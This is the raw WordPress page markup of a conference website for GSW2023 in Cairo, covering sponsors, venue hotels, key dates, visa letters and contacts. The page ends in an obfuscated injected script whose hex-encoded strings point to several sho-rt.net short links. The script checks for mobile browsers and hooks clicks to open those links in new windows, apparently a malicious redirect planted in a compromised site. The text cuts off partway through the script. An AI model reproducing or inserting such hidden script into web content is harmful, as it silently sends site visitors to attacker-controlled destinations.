style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570411308{margin-top: 130px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570070822{margin-top: -20px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570236779{margin-top: -20px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 